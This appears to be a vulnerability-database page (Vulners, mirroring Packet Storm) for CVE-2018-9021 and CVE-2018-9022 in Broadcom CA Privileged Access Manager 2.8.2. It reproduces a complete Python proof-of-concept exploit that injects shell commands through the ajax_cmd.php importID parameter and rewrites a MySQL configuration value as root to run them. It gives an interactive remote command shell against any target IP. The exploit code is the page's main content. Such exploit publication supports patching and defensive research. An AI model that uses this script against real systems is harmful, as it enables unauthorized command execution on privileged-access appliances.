Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

🗓️ 05 Dec 2019 00:00:00Reported by Peter LappType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 360 Views

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution by Peter Lap

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution Exploit #RCE
5 Dec 201900:00
zdt
ATTACKERKB		CVE-2018-9022
18 Jun 201818:29
attackerkb
ATTACKERKB		CVE-2018-9021
18 Jun 201818:29
attackerkb
Circl		CVE-2018-9021
5 Dec 201900:00
circl
Circl		CVE-2018-9022
5 Dec 201900:00
circl
CNVD		CA Privileged Access Manager Authentication Bypass Vulnerability
19 Jun 201800:00
cnvd
CNVD		CA Privileged Access Manager Authentication Bypass Vulnerability
19 Jun 201800:00
cnvd
Check Point Advisories		Broadcom CA Privileged Access Manager Remote Command Execution (CVE-2018-9021; CVE-2018-9022)
8 Dec 201900:00
checkpoint_advisories
CVE		CVE-2018-9021
18 Jun 201818:00
cve
CVE		CVE-2018-9022
18 Jun 201818:00
cve
Rows per page
`# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution  
# Author: Peter Lapp  
# Date: 2019-12-05  
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html  
# CVE: CVE-2018-9021 and CVE-2018-9022  
# Tested on: v2.8.2  
  
import urllib2  
import urllib  
import ssl  
import sys  
import json  
import base64  
  
  
ctx = ssl.create_default_context()  
ctx.check_hostname = False  
ctx.verify_mode = ssl.CERT_NONE  
  
  
def send_command(ip, cmd):  
cmd = urllib.quote_plus(cmd)  
url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'  
request = urllib2.Request(url, None)  
response = urllib2.urlopen(request, context=ctx)  
result = json.load(response)  
return result['responseData']  
  
def get_db_value():  
cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"  
db_value = send_command(ip,cmd)  
db_value = db_value.split('\n')[1]  
return db_value  
  
def encode_payload(cmd):  
sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"  
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "  
return cmd  
  
def restore_sql(value):  
sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"  
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "  
send_command(ip,cmd)  
  
def main():  
print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''  
  
if len(sys.argv) != 2:  
print "Usage: xceedium_rce.py <target ip>"  
sys.exit()  
  
global ip  
ip = sys.argv[1]  
print 'Enter commands below. Type exit to quit'  
  
while True:  
cmd = raw_input('# ')  
if cmd == "exit":  
sys.exit()  
orig_value = get_db_value()  
payload = encode_payload(cmd)  
send_command(ip, payload)  
send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')  
output = send_command(ip, 'cat /tmp/output')  
print output  
restore_sql(orig_value)  
  
  
  
if __name__ == "__main__":  
main()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Dec 2019 00:00Current
1.3Low risk
Vulners AI Score1.3
EPSS0.19943
remote command executioncve-2018-9021cve-2018-9022xceedium command executionprivileged access managersecurity notice
360